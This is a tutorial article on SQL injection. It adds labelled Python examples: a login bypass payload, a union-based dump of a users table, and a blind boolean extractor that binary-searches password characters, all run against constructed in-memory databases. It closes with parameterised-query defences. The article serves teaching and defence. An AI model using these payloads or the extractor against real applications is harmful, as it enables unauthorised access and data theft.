SQL Injection (SQLi)

What is SQL Injection?

SQL injection is an attack in which a user supplies SQL syntax in an input field that the application then embeds in a query and sends to the backend database for parsing and execution. In essence, the web application asks for a value (an address, a name, a password) and, instead of the intended value, the user submits text that the database interprets as part of the statement.

The vulnerability exists whenever a web application builds SQL statements from user-controlled values, typically by string concatenation, and forwards them to the database without keeping the data separate from the query. Any application that accepts input and performs a database lookup based on it (a login form, a search box, a product filter) is a potential entry point.


How is SQLi performed?

SQL is the common query language for database servers such as MySQL, Sybase and Microsoft SQL Server. Injection vulnerabilities arise when developers incorporate values obtained from forms, URL parameters, cookies or headers into query strings without validating them and without using parameterised queries, and then send those strings to the database server for execution.

To carry out a successful SQL injection attack, the attacker first needs to identify user inputs that end up inside a query. A common first probe is to submit a single quote (') in a field and watch for a database error message or a change in the page's behaviour, which indicates that the input is being parsed as SQL.

For example, when a user named Kartik logs in, he goes to the login page and enters his username and password. The web server builds a SQL query from those two values and sends it to the database server:

SELECT ID FROM Users
WHERE username = 'Kartik' AND password = 'kartik@123'

The database evaluates the WHERE clause as true or false for each row and returns the ID of any row that matches. If the application pastes the submitted password straight into the query, an attacker can change the logic of that clause by adding an OR condition. Submitting the password xyz' OR 1=1 -- (a quote that closes the string literal, an OR condition, and a comment marker that discards the rest of the statement) makes the server construct:

SELECT ID FROM Users
WHERE username = 'Kartik' AND password = 'xyz' OR 1=1 -- '

This is SQL injection. In this scenario, xyz is not Kartik's password, so the password comparison is false, but because AND binds more tightly than OR the clause reads (username = 'Kartik' AND password = 'xyz') OR 1=1, and 1=1 is true for every row. The query returns IDs whether or not the password was correct (in practice the first row of the table, which is often an administrator account), and the application treats the request as a successful login.
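The login described above, as an added example that is not part of the original article: a hypothetical login handler written in Python over an in-memory SQLite database with constructed sample rows. The table name, column names and user records mirror the article's query; the function names are assumptions for illustration. Passwords are stored in plain text only so that the SQL matches the article; a real application stores password hashes.

```python
import sqlite3

# Constructed sample data for this example; the table mirrors the article's query.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (ID INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO Users (ID, username, password) VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "Kartik", "kartik@123")],
    )
    return conn


def build_login_query(username: str, password: str) -> str:
    # The vulnerable pattern: user-controlled text is concatenated into the
    # statement, so quotes and keywords in the input become part of the SQL.
    return (
        "SELECT ID FROM Users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Hypothetical login handler: return the ID of the first matching row, or None."""
    row = conn.execute(build_login_query(username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Normal use: the correct password returns Kartik's ID.
    print(login_vulnerable(db, "Kartik", "kartik@123"))   # 2
    # Wrong password: no row matches.
    print(login_vulnerable(db, "Kartik", "xyz"))          # None
    # Injected password: the quote closes the string, OR 1=1 makes the WHERE
    # clause true for every row, and -- comments out the trailing quote.
    payload = "xyz' OR 1=1 -- "
    print(build_login_query("Kartik", payload))
    # AND binds tighter than OR, so every row matches and the first row in the
    # table is returned: the admin account, not Kartik.
    print(login_vulnerable(db, "Kartik", payload))        # 1
```

The same bypass works without the comment marker, for example with the password xyz' OR '1'='1, which leaves the trailing quote balanced; both variants are accepted by the concatenated query.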

Some of the most commonly used SQL commands:

Types of SQL Injection

In-band SQL Injection:

The attacker uses the same communication channel both to launch the attack and to retrieve its results: the injected query's output appears directly in the HTTP response. Because it is simple and effective, in-band SQL injection is one of the most prevalent types. It is further divided into two:

  • Error-based SQL injection: the attacker submits input that makes the database raise an error and reads the error message that the application returns in the response. Verbose error messages reveal the database product and version, table and column names and sometimes the values that a query produced, which is why production systems should return only generic errors.
  • Union-based SQL injection: the attacker appends a UNION SELECT to the original statement so that rows from another table are added to its result set and rendered in the same HTTP response. The injected SELECT must return the same number of columns as the original query, with compatible types, so the attacker first determines the column count (for example with ORDER BY n, or UNION SELECT NULL, NULL, ...) and pads the select list with NULL. The payload can be placed in a URL parameter or in a form field.
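The union-based technique described above, as an added example that is not part of the original article. It uses a hypothetical product-search endpoint written in Python over an in-memory SQLite database with constructed rows; the table names, the search function and the users table are assumptions. Step one finds the column count with ORDER BY probes, step two appends the UNION. SQLite and MySQL are lax about column types; Microsoft SQL Server and PostgreSQL require compatible types in each UNION position, which is why NULL is the usual padding value.

```python
import sqlite3

# Constructed sample database: a catalogue the search page queries, plus a users
# table the attacker wants to read.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'laptop', 999.0), (2, 'lamp', 19.5);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'kartik', 'kartik@123');
    """)
    return conn


def search_products(conn: sqlite3.Connection, term: str) -> list:
    # Hypothetical vulnerable search endpoint: the search term is concatenated
    # into the statement and every returned row is rendered into the page.
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def find_column_count(conn: sqlite3.Connection, max_cols: int = 10):
    # Step 1: a UNION is only accepted when both SELECTs have the same number of
    # columns. Probe with ORDER BY n; the first n that raises an error is one
    # past the column count of the original query.
    for n in range(1, max_cols + 1):
        try:
            search_products(conn, "' ORDER BY %d -- " % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_users(conn: sqlite3.Connection, column_count: int) -> list:
    # Step 2: append a SELECT over the target table, padded with NULL so the
    # column counts match. "zzz" matches no product, so only injected rows
    # come back in the response.
    wanted = ["username", "password"]
    select_list = ", ".join(wanted + ["NULL"] * (column_count - len(wanted)))
    payload = "zzz' UNION SELECT " + select_list + " FROM users -- "
    return search_products(conn, payload)


if __name__ == "__main__":
    db = make_db()
    cols = find_column_count(db)
    print("original query returns", cols, "columns")
    for row in dump_users(db, cols):
        print(row)
```

The rows of the users table come back through the same search-results page that normally shows product names and prices, which is exactly what "same channel" means for in-band injection.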

Inferential SQL Injection:

The attacker sends payloads to the server and observes its response and behaviour to infer information about the database, without the data ever being returned directly in the response. This is called blind SQL injection: the result of the injected query is not visible in-band, so the attacker reconstructs it one bit or one character at a time from a true/false signal.

Blind SQL injection depends on the server's response content and timing patterns, which typically makes it slower to carry out but no less damaging. It is categorised as follows:

  • Time-based SQL injection: the attacker injects a condition that makes the database pause for a number of seconds only when the condition is true (for example with SLEEP() in MySQL or WAITFOR DELAY in Microsoft SQL Server); the response time, rather than the content, encodes the true or false result.
  • Boolean-based SQL injection: the attacker injects a condition and the application returns visibly different content (a row shown or not shown, a different message or status code) depending on whether that condition is true or false.
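The boolean-based technique, as an added example that is not part of the original article. It uses a hypothetical "is this username taken?" endpoint written in Python over an in-memory SQLite database with one constructed account; the endpoint, the users table and the class name are assumptions. Each request leaks a single bit, so the extractor binary-searches each character's code point (about seven requests per character) instead of testing every candidate character. The same loop serves time-based injection if the oracle measures response time against a SLEEP() or WAITFOR DELAY payload instead of reading the page.

```python
import sqlite3

# Constructed sample database: one account whose password the attacker wants
# to recover through a yes/no side channel.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return conn


def user_exists(conn: sqlite3.Connection, username: str) -> bool:
    # Hypothetical vulnerable endpoint. It never shows data, only whether some
    # row matched: one bit per request.
    sql = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


class BlindExtractor:
    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.requests = 0  # count of requests, to show the cost of blind extraction

    def oracle(self, condition: str) -> bool:
        # Inject a condition AND-ed onto a row known to exist; the endpoint then
        # answers True exactly when the injected condition holds.
        self.requests += 1
        return user_exists(self.conn, "admin' AND (" + condition + ") -- ")

    def extract_string(self, expr: str, max_len: int = 64) -> str:
        # Recover the value of a scalar SQL expression (ASCII assumed) one
        # character at a time, each found by binary search on its code point.
        result = ""
        for pos in range(1, max_len + 1):
            lo, hi = 0, 127
            while lo < hi:
                mid = (lo + hi) // 2
                if self.oracle("unicode(substr(%s, %d, 1)) > %d" % (expr, pos, mid)):
                    lo = mid + 1
                else:
                    hi = mid
            # Past the end of the string substr() returns '' and unicode('') is
            # NULL in SQLite, so every comparison is false and the search settles
            # on 0: that is the end of the value.
            if lo == 0:
                break
            result += chr(lo)
        return result


if __name__ == "__main__":
    ex = BlindExtractor(make_db())
    secret = ex.extract_string("(SELECT password FROM users WHERE id = 1)")
    print(secret, "recovered in", ex.requests, "requests")
```

Recovering a six-character value takes around fifty requests here; a union-based injection would return it in one. That request volume is also what makes blind injection comparatively easy to spot in web server logs.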

Out-of-band SQL Injection:

Out-of-band SQL injection is used when the attacker cannot use the same channel to launch the attack and collect the results, or when the server's responses are too unstable for inference to be reliable. These techniques depend on the database server being able to make DNS or HTTP requests to a host the attacker controls and to carry data in those requests (for example a hostname built from a query result). It is mainly a fallback when in-band and inferential techniques are not available, and blocking outbound DNS and HTTP traffic from the database server removes it.

Impacts of SQL Injection

A successful SQL Injection attack can have very serious consequences.

  • Following a successful SQL injection, the attacker can read a wealth of personal or private information stored in the database, including user details such as names, addresses and card details. Because SQL databases hold sensitive data, disclosure of confidential information is the most common consequence.
  • SQL injection can also give the attacker access to the administrator portal. If usernames and passwords are checked with SQL built by string concatenation, an intruder may be able to log in as a different user, including an administrator, without knowing any password.
  • The entire server can be compromised, since a foothold in the database is often the first step toward the host running it.
  • SQL also provides the means to modify data in a database and to insert new data. In a financial application, for instance, an attacker could use SQL injection to manipulate account balances, invalidate transactions or divert funds to their own account.
  • On some database servers it is possible to reach the operating system through the database, whether by design (stored procedures that run commands or write files) or by misconfiguration. In that case the attacker can use SQL injection as the initial point of entry and then target the internal network behind the firewall.

Measures to prevent SQL Injection

The primary defence is to keep data separate from code: use parameterised queries (prepared statements), or an ORM that issues them, so the database receives the statement text and the values separately and never parses user input as SQL. Input validation and the measures below are defence in depth, not a substitute.

  • Validate every input for type, length and format; for structured data (usernames, identifiers, dates) use an allowlist expressed as a regular expression.
  • Ensure that all inputs are validated, including those that do not come from forms: URL parameters, cookies, HTTP headers and values read back from the database.
  • Where a value cannot be bound as a parameter, such as a table or column name in ORDER BY, map it through a fixed allowlist instead of concatenating it; escaping special characters by hand is error-prone and should not be the only control.
  • Run the application's database account with least privilege (no DDL, no file or operating-system access) so that a successful injection is contained.
  • Disable the display of database errors on production websites and return a generic error message; log the details server-side instead, since verbose errors feed error-based injection.
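The measures above applied to the article's login query, as an added example that is not part of the original article: a hypothetical hardened login handler in Python over an in-memory SQLite database with constructed rows. The table and column names mirror the article's query; the regular expression, the allowlist of sortable columns and the function names are assumptions.

```python
import re
import sqlite3

# Allowlist for a structured field: the shape of a valid username, as a regex.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")
# Identifiers cannot be bound as parameters, so sortable columns are a fixed set.
SORTABLE_COLUMNS = {"ID", "username"}


# Constructed sample data; the table mirrors the article's query.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (ID INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO Users (ID, username, password) VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "Kartik", "kartik@123")],
    )
    return conn


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Hypothetical hardened login handler. Returns the user's ID or None."""
    # Defence in depth: reject input of the wrong shape or length before it
    # reaches the database. This narrows what arrives; it is not what stops
    # injection.
    if not USERNAME_RE.match(username) or not 1 <= len(password) <= 128:
        return None
    # The real control: a parameterised query. The SQL text is fixed and the
    # values travel separately, so "xyz' OR 1=1 -- " is compared as a literal
    # password string and never parsed as SQL.
    row = conn.execute(
        "SELECT ID FROM Users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def list_users(conn: sqlite3.Connection, sort_by: str) -> list:
    # A column name in ORDER BY is an identifier, which drivers cannot bind as
    # a parameter. Map the untrusted value through the allowlist instead of
    # escaping it; only a string from SORTABLE_COLUMNS is ever interpolated.
    if sort_by not in SORTABLE_COLUMNS:
        raise ValueError("unsupported sort column")
    return [r[0] for r in conn.execute("SELECT username FROM Users ORDER BY " + sort_by)]


def handle_login(conn: sqlite3.Connection, username: str, password: str) -> dict:
    # Database errors are not echoed to the client, which would feed error-based
    # injection; the detail belongs in the server log only.
    try:
        user_id = login_safe(conn, username, password)
    except sqlite3.Error:
        return {"ok": False, "error": "internal error"}
    return {"ok": user_id is not None, "id": user_id}


if __name__ == "__main__":
    db = make_db()
    print(handle_login(db, "Kartik", "kartik@123"))        # {'ok': True, 'id': 2}
    print(handle_login(db, "Kartik", "xyz' OR 1=1 -- "))   # {'ok': False, 'id': None}
    print(list_users(db, "username"))                      # ['Kartik', 'admin']
```

The bypass payloads from earlier in the article return None here because the driver binds them as values, and the ORDER BY helper shows the one place where a parameter cannot help and an allowlist has to do the work.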

